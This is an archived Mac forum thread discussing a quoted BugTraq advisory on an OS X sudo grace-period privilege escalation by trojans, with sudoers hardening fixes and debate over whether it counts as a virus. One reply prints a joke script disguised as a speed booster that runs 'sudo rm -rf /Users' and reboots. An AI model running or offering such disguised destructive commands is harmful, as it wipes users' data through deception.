OSX - trojan apps can bypass authentication controls and gain root privileges

Discussion in 'General Mac Discussion' started by mthangbk, Apr 6, 2005.

  1. mthangbk macrumors newbie

    Joined:
    Mar 9, 2005
    Location:
    Ha Noi, Viet Nam
    #1
    I've just got this email on BugTraq today. It proves that it is possible to write a virus for OS X.


    ---------
    OSX Root Compromise
    04/05/2005

    Summary:
    OSX can be root compromised by a trojan application. The trojan
    application does not require explicit user authentication to elevate its
    privileges to root, nor does the root account need to be enabled. The
    Trojan application must be run from an account that is in the admin group,
    which is the default for the first account created and the context in
    which most users run. Once executed, the trojan application must only
    wait until the user leverages the sudo utility, either at the command line
    or by another application that leverages sudo to elevate its privileges.

    A demonstration app is available at www.adbas.net/software/rooted.dmg

    Status:
    The issue has been reported to Apple. Apple does not feel this is an issue
    as "Administrators should not run arbitrary software." While it is true
    that users should be cautious of running untrusted code, this answer is
    unacceptable. Administrators are required to authenticate actions to the
    core operating system. This vulnerability allows applications to bypass
    this requirement by "piggy-backing" off an unrelated authorization event.

    Versions Affected: OSX 10.3.x confirmed, OSX 10.2 probable

    Issue:
    There are 3 factors that allow this to be possible:

    1) sudo is, by default, configured to allow a 5-minute password timeout.
    This means that subsequent use of sudo within this grace period does not
    require a password for authentication.

    2) sudo is, by default, configured to be global, meaning its session is
    not tied to a tty but rather only to the user and time.

    3) sudo writes its entries to /var/log/system.log, which, by default, is
    readable by anyone in the admin group.

    All the trojan application needs to do is monitor the /var/log/system.log
    file for sudo entries for the user who executed the trojan. Once an entry
    is found, that is within the timeout grace window, the trojan can then
    elevate its privileges to root by simply executing sudo "anycommand".

    Fixing:
    Any of the following changes to sudo will correct the problem.

    To redirect sudo logs to /var/log/secure.log (which has the appropriate
    permissions and is a more appropriate log for authentication components),
    add the following lines to the /etc/sudoers file, in the "Defaults"
    section:

    Defaults:ALL !syslog
    Defaults:ALL logfile=/var/log/secure.log


    To remove the password grace period which will force the user to
    authenticate every time sudo is called, add the following line to the
    /etc/sudoers file, in the "Defaults" section:

    Defaults:ALL timestamp_timeout=0


    To limit sudo password grace period to individual ttys, instead of global,
    add the following line to the /etc/sudoers file, in the "Defaults"
    section:

    Defaults:ALL tty_tickets


    Redirecting sudo's logging and containing sudo sessions to individual
    ttys, in the author's opinion, provides the best balance of functionality
    and security.

    Please ensure that you use the visudo tool to edit the /etc/sudoers file.
    This utility will check your syntax, keeping you from corrupting your
    file. By default, visudo uses vi as its editor.
     
  2. AppleMatt macrumors 68000

    AppleMatt

    Joined:
    Mar 17, 2003
    Location:
    UK
    #2
    It's still not a virus, but thanks for playing.

    AppleMatt

     
  3. Peyote macrumors 6502a

    Peyote

    Joined:
    Apr 11, 2002
    #3
    Is the sudo command used when you are asked for the administrator's password? If not, seems like a far-fetched scenario. How often do you use the sudo command?
     
  4. angelneo macrumors 68000

    Joined:
    Jun 13, 2004
    Location:
    afk
    #4
    mthangbk: So in short, you are saying that this "virus" requires a user who is an admin as well to double click on that application and then for that same admin to run another application which requires a sudo in the same session. Sounds like an awfully long series of coincidences for this "virus" to work.
     
  5. rainman::|:| macrumors 603

    rainman::|:|

    Joined:
    Feb 2, 2002
    Location:
    iowa
    #5
    While this isn't a virus, this is a step closer... I've always kind of wondered about the 5-minute sudo grace, and why another process couldn't take advantage of that. But the fact remains that the virus would need to be installed and launched by the user, which is the first line of defense-- needing root privileges is actually the second line of defense. If malignant code can't propagate and still has to be launched, it's not much of a virus...

    Of course, once they figure out how to get the virus to propagate, we're screwed. Assuming Apple doesn't close up this hole first. Not like they drag their feet on the really critical stuff or anything...
     
  6. brap macrumors 68000

    Joined:
    May 10, 2004
    Location:
    Nottingham
    #6
    Not really. This trojan could just lay dormant, perhaps even attach itself to your startup, waiting for sudo to be invoked. Let's not start making excuses here, it's possible - and it's a lot more likely to be dangerous than the other 'test' viruses out there.

    I envisage a scenario where an app installer is faked, runs a mock dmg verification, and 'fails' it (while it does the dirty in the background). App lies running, user is none the wiser - for those running Powerbooks, who just sleep their machine, this is quite a danger.
     
  7. bryanc macrumors 6502

    Joined:
    Feb 12, 2003
    Location:
    Fredericton, NB Canada
    #7
    This is NOT A VIRUS!

    Arrgh! I hate it when people confuse any and all 'security issues' with viruses.

    Viruses are self-replicating and self-distributing. They may or may not have damaging consequences for the systems they infect, and they may or may not require admin privileges to work.

    The issue here is a potential unintended privilege escalation. It has nothing to do with viruses.

    Apple has intentionally made it possible for Admin users to access root privileges, but only by supplying a password. The proof-of-concept being discussed illustrates that such a user could inadvertently supply such privileges to other processes being run by the Admin user. I'm not sure that this is a security issue. It is an intentional feature of the security model of OS X (once you've supplied the root password, you don't need to re-supply it for every command...that would be a PITA). However, it is something that Admin users should be aware of.

    All this means is you should not execute untrusted code while logged in as an Admin user.

    This is no more of a security problem than people who insist on logging into their linux machines as root and then surfing the net. Sure, bad things can happen if you're an idiot and run your machine in ways that it was not designed to be run. How is this a problem?

    At any rate, it's got nothing to do with viruses.
     
  8. yellow Moderator emeritus

    yellow

    Joined:
    Oct 21, 2003
    Location:
    Portland, OR
    #8
    Sigh.

    Code:
    #!/bin/sh
    
    /bin/echo "Doubling your internet speed..."
    /usr/bin/sudo /bin/rm -rf /Users
    /bin/echo "Doubling your RAM..."
    /usr/bin/sudo /sbin/shutdown -r now
    Save this as a file called SuperDoubler.command, have users double click it..

    Ooooo! It's Mac OS X malware! Run for the hills!


    HOWEVER, the original poster's suggestions on shoring up some of the more lenient, out-of-the-box settings for sudo, are good ones.
     
  9. Peyote macrumors 6502a

    Peyote

    Joined:
    Apr 11, 2002
    #9

    I don't know how much I agree with that. Granted, today's viruses are self-replicating, but back in the early PC days, getting a virus in your computer may not have had anything to do with the virus being self-replicating, or infecting your PC from another machine. Back then, people mostly got viruses through downloading and running something they shouldn't, which is basically what this proof of concept involves.

    Perhaps malware is a more correct term these days when you have a clear distinction between self-propagating software, and non...however, I don't think it's entirely incorrect to label a piece of software that you download and run, and that does harm to your computer, as a virus. I remember back in the day in order to give someone's computer a virus, you had to bring a floppy over to his/her computer! Not that I ever did that or anything...lol
     
  10. yellow Moderator emeritus

    yellow

    Joined:
    Oct 21, 2003
    Location:
    Portland, OR
    #10
    A virus, by definition, has to self-replicate, in order to spread itself.. Which the above does not and cannot do. If the above installed itself, and then enabled postfix and sent out copies of itself to everyone in your Address Book, it would be MUCH closer to being a virus.
     
  11. Peyote macrumors 6502a

    Peyote

    Joined:
    Apr 11, 2002
    #11

    Yes, in the traditional sense of the word a virus self replicates, but when you are talking about the term applied to computers, definitions can and often do change. Perhaps the definition of virus as it relates to computers has changed over the years, but my point was simply that as little as 10 years ago viruses typically didn't self replicate...therefore getting bent out of shape about the terminology and liberal use of the word "virus" seems unnecessary to me.
     
  12. Peyote macrumors 6502a

    Peyote

    Joined:
    Apr 11, 2002
    #12
    I'm still interested in finding out in what common circumstances Sudo is used by either a user or application.
     
  13. mkrishnan Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #13
    Me too. Although I have to say I was surprised the first time I sudo'd, authenticated, closed the terminal window, and opened a new terminal window, and was not required to authenticate for a sudo from the new window. I don't see any obvious reason why the option of tying the sudo command to a terminal session wouldn't be a good thing, unless it is implicitly used when GUI apps make you authenticate, and there is no equivalent to the terminal session for them.
     
  14. yellow Moderator emeritus

    yellow

    Joined:
    Oct 21, 2003
    Location:
    Portland, OR
    #14
    I use sudo every day, multiple times a day. As a Mac sysadmin, it's necessary. For reading logs, for port scanning, for running scripts and compiled binaries, etc, etc. I think most users of OS X don't venture into the CLI that often (if at all). From the GUI, there's another 'sudo-like' authentication that is used. I believe it's /System/Library/CoreServices/SecurityAgent.app.

    I would agree that the term "malware" is much more generic and should be applied liberally to things such as these. It's not really fair to compare a virus from 10 years ago to a modern virus, as they have changed considerably in scope and sophistication. However, I insist that for it to be a TRUE Mac virus, it would need to reach out and infect other Macs in some way, without user intervention. Otherwise, it's just malware. Unfortunately, the term "virus" and "viruses" has become a catch all for end-users who really don't understand the distinction between variants.
     
  15. Sedulous macrumors 68000

    Sedulous

    Joined:
    Dec 10, 2002
    #15
    Manually running cron jobs, or prebindings.
     
  16. Peyote macrumors 6502a

    Peyote

    Joined:
    Apr 11, 2002
    #16

    So sudo is not used when OSX automatically runs cron jobs?
     
  17. mkrishnan Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #17
    I was thinking of more daily things. This is definitely true -- I have a maintenance script incorporating these things that uses sudo. But I would think that this would be a low-risk category, esp. for prebindings, because you have to reboot right after, anyway. Although I guess, if the malware was already active, it could instantly latch onto the sudo before you even finish prebinding....
     
  18. mkrishnan Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #18
    No -- you don't have to authenticate for it to happen, do you? The version of the tasks that are run via cron are already owned by root, so it isn't necessary. At least, that's the way I understand it. You'd have to authenticate or sudo to *change* the cron schedule, I think, but not for it to execute once it's set. You could in principle put anything for which you'd normally need to authenticate to root into the cron schedule, and it should run without the need for authentication, right?
     
  19. wrldwzrd89 macrumors G5

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #19
    That is correct. Regardless of what privileges the task needs, if it's in the system crontab, it won't have to be authenticated first - the task is considered authenticated when it is inserted in the system crontab - to do that requires root privileges.
     
  20. daveL macrumors 68020

    daveL

    Joined:
    Jun 18, 2003
    Location:
    Montana
    #20
    Let's face it, most Mac users have admin privileges. There's nothing that tells them to create a non-admin account to use for all their routine work. Granted, these same users are not *as* likely to be downloading miscellaneous 3rd party apps off the 'net and trying them out, compared to power users, but the risk remains. I certainly don't see *any* downside to making the suggested 'sudo' configuration changes; they can't possibly hurt and may well save your butt, however unlikely the suggested scenario may be. I also can't see why the suggested 'sudo' configuration isn't the out-of-the-box default.

    I'm updating the 'sudo' configuration on all my Macs now ...
     
  21. Sun Baked macrumors G5

    Sun Baked

    Joined:
    May 19, 2002
    #21
    Nope, he said trojan (the member said virus) -- but we did have problems with those in OS 9 also, the ones tied to some of the popular shareware games.

    Of course these days it'll be something like widgets, OS themes, torrent/chat apps, etc. that would tempt you to download a trojan.

    All they need to do is corrupt a popular downloaded item.
     
  22. csubear macrumors 6502a

    csubear

    Joined:
    Aug 22, 2003
    #22
    Will this kill the visual sudo's ability to work? Or does that GUI interface use something completely different?
     
  23. daveL macrumors 68020

    daveL

    Joined:
    Jun 18, 2003
    Location:
    Montana
    #23
    What "visual sudo"?
     
  24. mkrishnan Moderator emeritus

    mkrishnan

    Joined:
    Jan 9, 2004
    Location:
    Grand Rapids, MI, USA
    #24
    Since this came up, I've been wondering...I set up a main user account under my username (mkrishnan) as an admin, and a guest account with simplified finder, which I never use, but thought I might need at some point. I'm starting to think that if I ever clean install Panther, or I get Tiger, I should have set up an admin account that I primarily do not use, and then a managed account for my usual activity. What is the difference between a managed account with no limitations and an admin account?
     
  25. daveL macrumors 68020

    daveL

    Joined:
    Jun 18, 2003
    Location:
    Montana
    #25
    You won't be able to install software or modify system settings. Basically, if the files live in your /Users/xxx folder, you have control, otherwise it depends on the permissions and ownership of files outside your User folder. So, you can run apps and edit documents, pictures, etc., but you'll have to switch to the admin user to muck with network, security and any other settings that are system-wide or to install software, add system-wide plugins, etc.
     